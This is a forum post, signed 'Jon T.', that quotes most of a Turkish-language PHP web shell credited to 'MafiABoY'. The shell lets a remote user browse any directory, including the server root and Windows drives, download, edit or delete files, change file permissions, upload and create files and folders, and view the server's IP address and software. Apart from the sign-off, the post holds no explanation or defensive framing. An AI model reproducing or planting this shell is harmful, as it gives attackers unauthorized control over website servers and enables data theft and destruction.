    $msg=@chmod($dir.\"/\".$dismi2,$fileperm) ? \"<font color=\'#0000FF\'><b>$dismi2 İSİMLİ DOSYANIN</font></b>\" : \"<font color=\\\"#ff0000\\\">DEİŞTİRİLEMEDİ!!</font>\";
            echo \" <font color=\'#0000FF\'>CHMODU \".substr(base_convert(@fileperms(
    $dir.\"/\".$dismi2),10,8),-4).\" OLARAK DEİŞTİRİLDİ</font>\";
    }

    if(
    $op==\'efp\'){
    $izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
    echo \"<form method=post action=./
    $this_file?op=efp2>
          <div align=center><input name=\'dismi2\' type=\'text\' value=\'
    $dismi\' class=\'input\' readonly>CHMOD:
          <input type=\'text\' name=\'fileperm\' size=\'20\' value=\'
    $izinler2\' class=\'input\'>
          <input name=\'dir\' type=\'hidden\' value=\'
    $yol\'>
          <input type=\'submit\' value=\'TAMAM\' class=\'input\'></div><br>
          </form>\";

    }


    $path=$dir;
    if(isset(
    $dir)){
    if (
    $dir = @opendir(\"$dir\")) {
    while ((
    $file = readdir($dir)) !== false) {
    if(
    $file!=\".\" && $file!=\"..\"){
    if(is_file(\"
    $path/$file\")){
    $disk_space=filesize(\"$path/$file\");
    $kb=$disk_space/1024;
    $total_kb = number_format($kb, 2, \'.\', \'\');
    $total_kb2=\"Kb\";


    echo \"<div align=right><font face=\'arial\' size=\'2\' color=\'#C0C0C0\'><b> 
    $file</b></font> - <a href=\'./$this_file?save=$path/$file&fname=$file\'>indir</a> - <a href=\'./$this_file?op=edit&fname=$path/$file&dir=$path\'>düzenle</a> - \";
    echo \"<a href=\'./
    $this_file?op=del&fname=$path/$file&dir=$path\'>sil</a> - <b>$total_kb$total_kb2</b> - \";
    @
    $fileperm=substr(base_convert(fileperms(\"$path/$file\"),10,8),-4);
    echo \"<a href=\'./
    $this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path\'><font color=\'#FFFF00\'>$fileperm</font></a>\";
    echo \"<br></div>\\n\";
    }else{
    echo \"<div align=left><a href=\'./
    $this_file?dir=$path/$file\'>GİT></a> <font face=\'arial\' size=\'3\' color=\'#808080\'> $path/$file</font> - <b>DIR</b> - <a href=\'./$this_file?op=dd&yol=$path/$file&here=$path\'>Sil</a> - \";
    $dirperm=substr(base_convert(fileperms(\"$path/$file\"),10,8),-4);
    echo \"<font color=\'#FFFF00\'>
    $dirperm</font>\";
    echo \" <br></div>\\n\";

    }
    }
    }
    closedir(
    $dir);
    }
    }




    echo \"<center>------------------------------</center>\";
    echo \"<center><a href=\'./
    $this_file?dir=$DOCUMENT_ROOT\'>Root Klasörüne Git</a></center>\";
    echo \"<center><a href=\'./
    $this_file?dir=/\'>Linux Kök Dizinine Git</a></center>\";
    if(file_exists(\"B:\\\\\")){
    echo \"<center><a href=\'./
    $this_file?dir=B:\\\\\'>B:\\\\</a></center>\";
    } else {}
    if(file_exists(\"C:\\\\\")){
    echo \"<center><a href=\'./
    $this_file?dir=C:\\\\\'>C:\\\\</a></center>\";
    } else {}
    if (file_exists(\"D:\\\\\")){
     echo \"<center><a href=\'./
    $this_file?dir=D:\\\\\'>D:\\\\</a></center>\";
    } else {}
    if (file_exists(\"E:\\\\\")){
     echo \"<center><a href=\'./
    $this_file?dir=E:\\\\\'>E:\\\\</a></center>\";
    } else {}
    if (file_exists(\"F:\\\\\")){
     echo \"<center><a href=\'./
    $this_file?dir=F:\\\\\'>F:\\\\</a></center>\";
    } else {}
    if (file_exists(\"G:\\\\\")){
     echo \"<center><a href=\'./
    $this_file?dir=G:\\\\\'>G:\\\\</a></center>\";
    } else {}
    if (file_exists(\"H:\\\\\")){
     echo \"<center><a href=\'./
    $this_file?dir=H:\\\\\'>H:\\\\</a></center>\";
    } else {}


    echo \"--------------------------------------------------------------------------------------------------------------------------------------------------------------------\";
    echo \"<center><font size=\'+1\' color=\'#FF0000\'><b>SERVER BİLGİLERİ</b></font><br></center>\";
    echo \"<br><u><b>
    $SERVER_SIGNATURE</b></u>\";
    echo \"<b><u>Software</u>: 
    $SERVER_SOFTWARE</b><br>\";
    echo \"<b><u>Server IP</u>: 
    $SERVER_ADDR</b><br>\";
    echo \"<br>\";
    echo \"--------------------------------------------------------------------------------------------------------------------------------------------------------------------\";
    echo \"<center><font size=\'+1\' color=\'#FF0000\'><b>İŞLEMLER</b></font><br></center>\";
    echo \"<br><center><font size=\'4\'><a href=\'
    $this_file?op=up&dir=$path\'>Dosya Gönder</a></font></center>\";
    echo \"<br><center><font size=\'4\'><a href=\'
    $this_file?op=mf&dir=$path\'>Dosya Oluştur</a></font></center>\";
    echo \"<br><center><font size=\'4\'><a href=\'
    $this_file?op=md&dir=$path\'>Klasör Oluştur</a></font></center>\";
    echo \"--------------------------------------------------------------------------------------------------------------------------------------------------------------------\";
    echo \"<br>
          <center>Tüm hakları sahibi MafiABoY\'a aittir</center>\";
    ?>
    Regards,
    Jon T.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •